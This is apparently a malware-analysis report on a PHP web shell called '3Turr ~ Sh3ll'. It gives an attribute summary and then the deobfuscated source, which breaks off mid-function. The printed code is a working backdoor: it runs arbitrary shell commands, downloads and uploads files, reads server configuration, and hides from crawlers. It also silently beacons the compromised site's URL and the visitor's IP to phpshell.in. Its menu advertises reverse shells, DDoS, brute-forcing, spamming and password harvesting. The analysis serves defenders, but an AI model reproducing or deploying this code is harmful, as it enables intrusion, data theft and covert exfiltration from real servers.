PHP Malware Analysis
deobf.php, flowers1.php
md5: 3e5649ff5799e78998753f28f65162ce
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- byhero44@gmail.com (Original)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
- base64_encode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
- phpinfo (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- proc_open (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- copy (Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original, Traces)
Title
- 3Turr ~ Sh3ll (HTML)
URLs
- http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif (Deobfuscated, HTML, Original)
- http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif (Deobfuscated, HTML, Original)
- http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif (Deobfuscated, HTML, Original)
- http://apycom.com/ssc-data/items/1/00bfff/images/lava.png (Deobfuscated, HTML, Original)
- http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png (Deobfuscated, HTML, Original)
- http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png (Deobfuscated, HTML, Original)
- http://i.imgur.com/mVdgU0V.png (Deobfuscated, HTML, Original)
- http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png (Deobfuscated, HTML, Original)
- http://localhost/uploads/deobf.php (Traces)
- http://localhost/uploads/flowers1.php (Traces)
- http://nyccah.rayogram.com/3Turr (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=7xJptQEY (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=8AxYU3Rd (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=aLsyUHdu (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=bTR5Pb38 (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=hsMFJvrK (Deobfuscated, Original)
- http://pastebin.com/raw.php?i=jwz4TeZq (Deobfuscated, Original)
- http://phpshell.in/l (Deobfuscated, Traces)
- http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Rlb2JmLnBocA== (Traces)
- http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Zsb3dlcnMxLnBocA== (Traces)
- http://www (Deobfuscated, Original)
- http://www.w3.org/1999/xhtml (Deobfuscated, HTML, Original)
- http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd (Deobfuscated, Original)
- https://avatars1.githubusercontent.com/u/13343571?v=3& (HTML)
- https://avatars1.githubusercontent.com/u/13343571?v=3&s=460 (Deobfuscated, Original)
- https://www.facebook.com/monds.hackers (Deobfuscated)
Deobfuscated PHP code
<?php
@define('VERSION', '2.0');
@error_reporting(1);
@session_start();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if (@preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.1 404 Not Found');
exit;
}
if (base64_decode($_POST['p1'], true) && ($_POST['p1'] != 'mkdir' && $_POST['p1'] != 'uploadFile') && $_POST['p2'] != 'd2') {
$_POST['p1'] = base64_decode(urldecode($_POST['p1']));
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower("PHP") == "win") {
$sys = 'win';
} else {
$sys = 'unix';
}
$home_cwd = @getcwd();
if (base64_decode($_REQUEST['c'], true)) {
$_REQUEST['c'] = base64_decode(urldecode($_REQUEST['c']));
}
@chdir($_REQUEST['c']);
$cwd = @getcwd();
if ($sys == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
function yemenEx($in)
{
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("\r\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
$down = @getcwd();
if ($sys == "win") {
$down .= '';
} else {
$down .= '/';
}
if (isset($_POST['rtdown'])) {
$url = $_POST['rtdown'];
$newfname = $down . basename($url);
$file = fopen($url, "rb");
if ($file) {
$newf = fopen($newfname, "wb");
if ($newf) {
while (!feof($file)) {
fwrite($newf, fread($file, 8192), 8192);
}
}
}
if ($file) {
fclose($file);
}
if ($newf) {
fclose($newf);
}
}
function yemenhead()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['default_charset'];
}
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$on = "<font color=#0F0> ON </font>";
$of = "<font color=red> OFF </font>";
$none = "<font color=#0F0> NONE </font>";
if (function_exists('curl_version')) {
$curl = $on;
} else {
$curl = $of;
}
if (function_exists('mysql_get_client_info')) {
$mysql = $on;
} else {
$mysql = $of;
}
if (function_exists('mssql_connect')) {
$mssql = $on;
} else {
$mssql = $of;
}
if (function_exists('pg_connect')) {
$pg = $on;
} else {
$pg = $of;
}
if (function_exists('oci_connect')) {
$or = $on;
} else {
$or = $of;
}
if (@ini_get('disable_functions')) {
$disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;
width: 80%;
" >' . @str_replace(',', ', ', @ini_get('disable_functions')) . '</font>';
} else {
$disfun = "<span>Disabled Functions: </span><font color=#00ff00 >All Functions Enable</font>";
}
if (@ini_get('safe_mode')) {
$safe_modes = "<font color=red>ON</font>";
} else {
$safe_modes = "<font color=#0F0 >OFF</font>";
}
if (@ini_get('open_basedir')) {
$open_b = @ini_get('open_basedir');
} else {
$open_b = $none;
}
if (@ini_get('safe_mode_exec_dir')) {
$safe_exe = @ini_get('safe_mode_exec_dir');
} else {
$safe_exe = $none;
}
if (@ini_get('safe_mode_include_dir')) {
$safe_include = @ini_get('safe_mode_include_dir');
} else {
$safe_include = $none;
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$drives = "";
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . base64_encode($drive . ':/') . '\')">[ ' . $drive . ' ]</a> ';
}
}
echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;\r\n\r\n\r\n charset=utf-8\" />\r\n<title>3Turr ~ Sh3ll</title>\r\n<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"https://avatars1.githubusercontent.com/u/13343571?v=3&s=460\">\r\n<script language=\"javascript\">\r\nfunction Encoder(name)\r\n{\r\n\tvar e = document.getElementById(name);\r\n\r\n\r\n\te.value = btoa(e.value);\r\n\r\n\r\n\treturn true;\r\n\r\n\r\n}\r\nfunction Encoder2(name)\r\n{\r\n\tvar e = document.getElementById(name);\r\n\r\n\r\n\te.value = btoa(e.value);\r\n\r\n\r\n\treturn true;\r\n\r\n\r\n}\r\n</script>\r\n<style type=\"text/css\">\r\n<!--\r\n.headera { \r\ncolor: red;\r\n\r\n\r\n}\r\n.whole {\r\n\t\r\n\theight:auto;\r\n\r\n\r\n\twidth: auto;\r\n\r\n\r\n\tmargin-top: 10px;\r\n\r\n\r\n\tmargin-right: 10px;\r\n\r\n\r\n\tmargin-left: 10px;\r\n\r\n\r\n background-image: linear-gradient(\r\n rgba(0, 0, 0, 0.4), \r\n rgba(0, 0, 0, 0.4)\r\n ), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png);\r\n\r\n\r\n}\r\n.header {\r\ntable-layout: fixed;\r\n\r\n\r\n\theight: auto;\r\n\r\n\r\n\twidth: auto;\r\n\r\n\r\n\tborder: 4px solid #5BEEFF;\r\n\r\n\r\n\tcolor: yellow;\r\n\r\n\r\n\tfont-size: 12px;\r\n\r\n\r\n\tfont-family: Verdana, Geneva, sans-serif;\r\n\r\n\r\n} \r\ntr {\r\n display: table-row;\r\n\r\n\r\n vertical-align: inherit;\r\n\r\n\r\n padding-right:10px;\r\n\r\n\r\n}table {\r\n display: table;\r\n\r\n\r\n border-collapse: separate;\r\n\r\n\r\n border-spacing: 2px;\r\n\r\n\r\n border-color: #5BEEFF;\r\n\r\n\r\n}\r\n.header a {color:#0F0;\r\n\r\n\r\n text-decoration:none;\r\n\r\n\r\n}\r\nspan {\r\n\tfont-weight: bolder;\r\n\r\n\r\n\tcolor: #FFF;\r\n\r\n\r\n}\r\n#meunlist {\r\n\tfont-family: Verdana, Geneva, sans-serif;\r\n\r\n\r\n\tcolor: #FFF;\r\n\r\n\r\n\tbackground-color: #000;\r\n\r\n\r\n\twidth: auto;\r\n\r\n\r\n\tborder-right-width: 7px;\r\n\r\n\r\n\tborder-left-width: 7px;\r\n\r\n\r\n\tborder-top-style: solid;\r\n\r\n\r\n\tborder-right-style: solid;\r\n\r\n\r\n\tborder-bottom-style: solid;\r\n\r\n\r\n\tborder-left-style: solid;\r\n\r\n\r\n\tborder-color: #5BEEFF;\r\n\r\n\r\n\theight: auto;\r\n\r\n\r\n\tfont-size: 12px;\r\n\r\n\r\n\tfont-weight: bold;\r\n\r\n\r\n\tborder-top-width: 0px;\r\n\r\n\r\n}\r\n .whole #meunlist ul {\r\n\tpadding-top: 5px;\r\n\r\n\r\n\tpadding-right: 5px;\r\n\r\n\r\n\tpadding-bottom: 7px;\r\n\r\n\r\n\tpadding-left: 2px;\r\n\r\n\r\n\ttext-align:center;\r\n\r\n\r\n\tlist-style-type: none;\r\n\r\n\r\n\tmargin: 0px;\r\n\r\n\r\n}\r\n .whole #meunlist li {\r\n\tmargin: 0px;\r\n\r\n\r\n\tpadding: 0px;\r\n\r\n\r\n\tdisplay: inline;\r\n\r\n\r\n}\r\n .whole #meunlist a {\r\n font-family: arial, sans-serif;\r\n\r\n\r\n\tfont-size: 14px;\r\n\r\n\r\n\ttext-decoration:none;\r\n\r\n\r\n\tfont-weight: bold;\r\n\r\n\r\n\tcolor: #fff;\r\n\r\n\r\n\tclear: both;\r\n\r\n\r\n\twidth: 100px;\r\n\r\n\r\n\tmargin-right: -6px;\r\n\r\n\r\n\tpadding-top: 3px;\r\n\r\n\r\n\tpadding-right: 15px;\r\n\r\n\r\n\tpadding-bottom: 3px;\r\n\r\n\r\n\tpadding-left: 15px;\r\n\r\n\r\n\tborder-right-width: 1px;\r\n\r\n\r\n\tborder-right-style: solid;\r\n\r\n\r\n\tborder-right-color: #FFF;\r\n\r\n\r\n}\r\n .whole #meunlist a:hover {\r\n\tcolor: red;\r\n\r\n\r\n\tbackground: #fff;\r\n\r\n\r\n}\r\n.menu a:hover {\tbackground:#5BEEFF;\r\n\r\n\r\n}\r\na:hover { color:red;\r\n\r\n\r\nbackground:black;\r\n\r\n\r\n} \r\n .ml1 { border:1px solid #2438CF;\r\n\r\n\r\npadding:5px;\r\n\r\n\r\nmargin:0;\r\n\r\n\r\noverflow: auto;\r\n\r\n\r\n } \r\n .bigarea { width:100%;\r\n\r\n\r\nheight:250px;\r\n\r\n\r\n border:1px solid red;\r\n\r\n\r\n background:#171717;\r\n\r\n\r\n}\r\n input, textarea, select { margin:0;\r\n\r\n\r\ncolor:#FF0000;\r\n\r\n\r\nbackground-color:#000;\r\n\r\n\r\nborder:1px solid #5BEEFF;\r\n\r\n\r\n font: 9pt Monospace,\"Times New roman\";\r\n\r\n\r\n } \r\n form { margin:0px;\r\n\r\n\r\n } \r\n #toolsTbl { text-align:center;\r\n\r\n\r\n } \r\n .toolsInp { width: 80%;\r\n\r\n\r\n } \r\n .main th {text-align:left;\r\n\r\n\r\nbackground-color:#990000;\r\n\r\n\r\ncolor:white;\r\n\r\n\r\n} \r\n .main td, th{vertical-align:middle;\r\n\r\n\r\n} \r\n pre {font-family:Courier,Monospace;\r\n\r\n\r\n} \r\n #cot_tl_fixed{position:fixed;\r\n\r\n\r\nbottom:0px;\r\n\r\n\r\nfont-size:12px;\r\n\r\n\r\nleft:0px;\r\n\r\n\r\npadding:4px 0;\r\n\r\n\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n\r\n\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n\r\n\r\n} \r\n}";
if (is_writable($GLOBALS['cwd'])) {
echo ".foottable {\r\n width: 300px;\r\n\r\n\r\n font-weight: bold;\r\n\r\n\r\n }";
} else {
echo ".foottable {\r\n width: 300px;\r\n\r\n\r\n font-weight: bold;\r\n\r\n\r\n background-color:red;\r\n\r\n\r\n }\r\n .dir {\r\n background-color:red;\r\n\r\n\r\n \r\n }\r\n ";
}
echo ".main th{text-align:left;\r\n\r\n\r\n}\r\n .main a{color: #FFF;\r\n\r\n\r\n}\r\n .main tr:hover{background-color:red;\r\n\r\n\r\n}\r\n .ml1{ border:1px solid #444;\r\n\r\n\r\npadding:5px;\r\n\r\n\r\nmargin:0;\r\n\r\n\r\noverflow: auto;\r\n\r\n\r\n }\r\n .bigarea{ width:99%;\r\n\r\n\r\n height:300px;\r\n\r\n\r\n } \r\n </style>\r\n";
echo "<script>\r\n var c_ = '" . base64_encode(htmlspecialchars($GLOBALS['cwd'])) . "';\r\n\r\n\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n\r\n\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\r\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n\r\n\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\r\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n\r\n\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\r\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n\r\n\r\n var d = document;\r\n\r\n\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;\r\n\r\n\r\nelse d.mf.a.value=a_;\r\n\r\n\r\n\t\tif(c!=null)d.mf.c.value=c;\r\n\r\n\r\nelse d.mf.c.value=c_;\r\n\r\n\r\n\t\tif(p1!=null)d.mf.p1.value=p1;\r\n\r\n\r\nelse d.mf.p1.value=p1_;\r\n\r\n\r\n\t\tif(p2!=null)d.mf.p2.value=p2;\r\n\r\n\r\nelse d.mf.p2.value=p2_;\r\n\r\n\r\n\t\tif(p3!=null)d.mf.p3.value=p3;\r\n\r\n\r\nelse d.mf.p3.value=p3_;\r\n\r\n\r\n\t\tif(charset!=null)d.mf.charset.value=charset;\r\n\r\n\r\nelse d.mf.charset.value=charset_;\r\n\r\n\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\r\n\r\n\t\td.mf.submit();\r\n\r\n\r\n\t}</script>";
echo '
</head>
<div class="whole1"></div>
<body bgcolor="#000000" color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div style="position:absolute;
top:30px;
right:50px;
font-size:25px;
font-family:auto;
z-index:-1;
" rowspan="8"><font color=red><img height="190px" height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png" /></font><center><font style="color:#5BEEFF;
text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;
">3</font><font style="color:red;
text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;
">Turr</font>
</div>
<div class="whole">
<form method=post name=mf style="display:none;
">
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>
<div class="header"><table class="headmain" width="100%" border="0" align="lift">
<tr>
<td width="3%"><span>Uname:</span></td>
<td colspan="2">' . substr(@php_uname(), 0, 120) . '</td>
</tr>
<tr>
<td><span>User:</span></td>
<td>' . $uid . ' [ ' . $user . ' ] <span> Group: </span>' . $gid . ' [ ' . $group . ' ]
</tr>
<tr>
<td><span>PHP:</span></td>
<td>' . @phpversion() . ' <span> Safe Mode: ' . $safe_modes . '</span></td>
</tr>
<tr>
<td><span>IP:</span></td>
<td>' . @$_SERVER["SERVER_ADDR"] . ' <span>Server IP:</span> ' . @$_SERVER["REMOTE_ADDR"] . '</td>
</tr>
<tr>
<td><span>WEBS:</span></td>
<td width="76%">';
if ($GLOBALS['sys'] == 'unix') {
$d0mains = @file("/etc/named.conf");
if (!$d0mains) {
echo "CANT READ named.conf";
} else {
$count;
foreach ($d0mains as $d0main) {
if (@ereg("zone", $d0main)) {
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
flush();
$count++;
}
}
}
echo "<b>{$count}</b> Domains";
}
} else {
echo "CANT READ |Windows|";
}
echo '</td>
</tr>
<tr>
<td height="16"><span>HDD:</span></td>
<td>' . yemenSize($totalSpace) . ' <span>Free:</span>' . yemenSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</td>
</tr>';
if ($GLOBALS['sys'] == 'unix') {
if (!@ini_get('safe_mode')) {
echo "<tr><td height=\"18\" colspan=\"2\"><span>Useful : </span>";
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
foreach ($userful as $item) {
if (yemenWhich($item)) {
echo $item . ',';
}
}
echo "</td>\r\n </tr>\r\n <tr>\r\n <td height=\"0\" colspan=\"2\"><span>Downloader: </span>";
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
foreach ($downloaders as $item2) {
if (yemenWhich($item2)) {
echo $item2 . ',';
}
}
echo "</td>\r\n </tr>";
} else {
echo "<tr><td height=\"18\" colspan=\"2\"><span>useful: </span>";
echo "--------------</td>\r\n </tr><td height=\"0\" colspan=\"2\"><span>Downloader: </span>-------------</td>\r\n </tr>";
}
} else {
echo "<tr><td height=\"18\" colspan=\"2\"><span>Window: </span>";
echo yemenEx('ver');
}
echo '<tr>
<td height="16" colspan="2">' . $disfun . '</td>
</tr>
<tr>
<td height="16" colspan="2"><span>cURL:' . $curl . ' MySQL:' . $mysql . ' MSSQL:' . $mssql . ' PostgreSQL:' . $pg . ' Oracle: </span>' . $or . '</td><td width="15%"></td>
</tr>
<tr>
<td height="11" style="width:70%" colspan="3"><span>Open_basedir:' . $open_b . ' Safe_mode_exec_dir:' . $safe_exe . ' Safe_mode_include_dir:' . $safe_include . '</td>
</tr>
<tr>
<td height="11"><span>Server </span></td>
<td colspan="2">' . @getenv('SERVER_SOFTWARE') . '</td>
</tr>';
if ($GLOBALS[sys] == "win") {
echo '<tr>
<td height="12"><span>DRIVE:</span></td>
<td colspan="2">' . $drives . '</td>
</tr>';
}
echo '<tr>
<td height="12"><span>PWD:</span></td>
<td colspan="2" >' . $cwd_links . ' <a href=# onclick="g(\'FilesMan\',\'' . base64_encode($GLOBALS['home_cwd']) . '\')"><font color=red >[HOME]</font></a></td>
</tr>
</table>
</div>
<div id="menu-box">
<style type="text/css">
div#menu{height:40px;
:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;
}
div#menu ul{margin:0;
padding:0;
list-style:none;
float:left;
}
div#menu ul.menu {padding-left:10px;
}
div#menu li{position:relative;
z-index:9;
margin:0;
padding:0 5px 0 0;
display:block;
float:left;
}
div#menu li:hover>ul {left:-2px;
}
div#menu a {position:relative;
z-index:10;
height:40px;
display:block;
float:left;
line-height:40px;
text-decoration:none;
font:normal 13px Trebuchet MS;
}
div#menu a:hover {color:#000;
}
div#menu li.current a {}
div#menu span {display:block;
cursor:pointer;
background-repeat:no-repeat;
background-position:95% 0;
}
div#menu ul ul a.parent span {background-position:95% 8px;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);
}
div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);
}
div#menu a {padding:0 6px 0 10px;
line-height:30px;
color:#fff;
}
div#menu span {margin-top:5px;
}
div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;
}
div#menu li.last {background:none;
}
div#menu ul ul li {background:none;
}
div#menu ul ul {position:absolute;
top:38px;
left:-999em;
width:180%;
padding:1px 0 0 0;
background:rgb(45,45,45);
margin-top:1px;
}
div#menu ul ul a {padding:0 0 0 15px;
height:auto;
float:none;
display:block;
line-height:24px;
color:rgb(169,169,169);
}
div#menu ul ul span {margin-top:0;
padding-right:15px;
_padding-right:20px;
color:rgb(169,169,169);
}
div#menu ul ul a:hover span {color:#fff;
}div#menu ul ul li.last {background:none;
}
div#menu ul ul li {width:100%;
}div#menu ul ul ul {padding:1;
margin:-38px 0 0 163px !important;
margin-left:172px;
}div#menu ul ul ul {background:rgb(41,41,41);
}
div#menu ul ul ul ul {background:rgb(38,38,38);
}div#menu ul ul ul ul {background:rgb(35,35,35);
}
div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
width:13px;
height:44px;
z-index:8;
position:absolute;
margin:-1px 0 0 -5px;
}
div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
height:44px;
margin-right:8px;
}
</style>
<div id="menu"><ul class="menu">
<li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
<li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">SYSTEM</a></li>
<li><a href="#">PHP</a>
<ul>
<li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
<li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
</ul>
<li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
<li><a href="#" >BRUTE&CRACK</a>
<ul>
<li><a href="#" onclick="g(\'bf\',null,\'\',\'\',\'\')">CPanel</a></li>
<li><a href="#" onclick="g(\'bruteftp\',null,\'\',\'\',\'\')">FTP</a></li>
</ul>
</li>
<li><a href="#">NETWORK</a>
<ul>
<li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">BACK CONNECT</a></li>
<li><a href="#" onclick="g(\'net\',null,\'\',\'\',\'\')">BIND PORT</a></li>
</ul>
<li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
<li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
<li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
<!--
<li><a href="#" onclick="g(\'wp\',null,\'\',\'\',\'\')">Mass Wpress</a></li>
<li><a href="#" onclick="g(\'joom\',null,\'\',\'\',\'\')">Mass Joomla</a></li>
-->
<li><a href="#">Perl Sh3ll</a>
<ul>
<li><a href="#" onclick="g(\'perl\',null,\'\',\'\',\'\')">CGI 1.0v</a></li>
<li><a href="#" onclick="g(\'perl4\',null,\'\',\'\',\'\')">CGI 1.4v</a></li>
</ul>
</li>
<li><a href="#" >Mirrors</a>
<ul>
<li><a href="#" onclick="g(\'zone\',null,\'\',\'\',\'\')">Zone-h.org</a></li>
<li><a href="#" onclick="g(\'zonejoy\',null,\'\',\'\',\'\')">Aljyyosh.org</a></li>
</ul>
</li>
<li><a href="#">TOOLS</a>
<ul>
<li><a href="#" onclick="g(\'rev\',null,\'\',\'\',\'\')">Reverse IP</a></li>
<li><a href="#" onclick="g(\'zip\',null,\'\',\'\',\'\')">ZIP</a></li>
<li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')">Mail Spammer</a></li>
</ul>
</li>
<li><a href="#" >3Turr-VIP</a>
<ul>
<li><a href="#" onclick="g(\'conpass\',null,\'\',\'\',\'\')">C0nf1G-P4$$\'s</a></li>
</ul>
</li>
<li><a href="#" onclick="g(\'yemen\',null,\'\',\'\',\'\')">ABOUT</a></li>
</ul>
</div>
';
?>
<footer id="det" style="z-index:9999;
background:#000;
position:fixed;
left:0px;
right:0px;
bottom:0px;
background:rgb(0,0,0);
padding:3px;
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000;
color:red;
">
<font align=center>3Turr ~ SH311</font>
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif (getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode(',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = "http://phpshell.in/l-" . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@($gitt = file_get_contents($x));
}
} elseif (function_exists('file_get_contents')) {
@($gitt = file_get_contents($x));
}
?>
</footer>
<form style="z-index:9999;
position:fixed;
left:1;
bottom:4px;
display:inline" onsubmit="Encoder('encod');
g('proc',null,this.c.value);
return false;
">
<input style="width:290px" type=text id=encod name=c value="" placeholder="Execute"
<?php
!isset($_POST['a']) || $_POST['a'] != 'proc' || !isset($_POST['p1']) || $_POST['p1'] == '' ? print "autofocus" : 0;
?> >
<input type=submit style="color:red;
width:30px;
" value=">>">
</form>
<!--###################-->
<form style="z-index:9999;
position:fixed;
right:10px;
bottom:3px;
display:inline;
" method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='
<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='
<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>'>
<input style="border:1px solid #5BEEFF;
height:19px;
value:[ select ];
" class="toolsInp" type=file name=f > <input style="color:red;
width:30px;
" type=submit value=">>" ></form>
<?php
}
function yemenfooter()
{
$is_writable = is_writable($GLOBALS['cwd']) ? "<font color=#00ff00 >[ Writeable ]</font>" : "<font color=red>[ Not writable ]</font>";
?>
</div>
<table style="border: 1px solid #5BEEFF;
border-top:0px;
" class=info id=toolsTbl cellpadding=5 cellspacing=5 width=100%">
<tr>
<td><form onsubmit="Encoder('cdir');
g(null,this.c.value);
return false;
"><span>Change dir:</span><br><input id=cdir class="toolsInp" type=text name=c style="color:white;
" value="
<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>"><input type=submit s s value=">>"></form></td>
<td><form onsubmit="Encoder('rfile');
g('FilesTools',null,this.f.value);
return false;
"><span>Read file:</span><br><input id=rfile class="toolsInp" type=text name=f><input type=submit s s value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);
return false;
"><span>Make dir:</span><br><input id=mdir class="toolsInp" type=text name=d><input type=submit s s value=">>"></form>
<?php
echo $is_writable;
?></td>
<td><form onsubmit="Encoder('mfile');
g('FilesTools',null,this.f.value,'mkfile');
return false;
"><span>Make file:</span><br><input id=mfile class="toolsInp" type=text name=f><input type=submit s s value=">>"></form>
<?php
echo $is_writable;
?></td>
</tr>
</table>
<br><br>
</div>
<footer id="det" style="position:fixed;
left:0px;
right:0px;
top:0px;
background:rgb(0,0,0);
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000"></footer>
</body></html>
<?php
}
if (!function_exists("posix_getpwuid") && strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false) {
function posix_getpwuid($p)
{
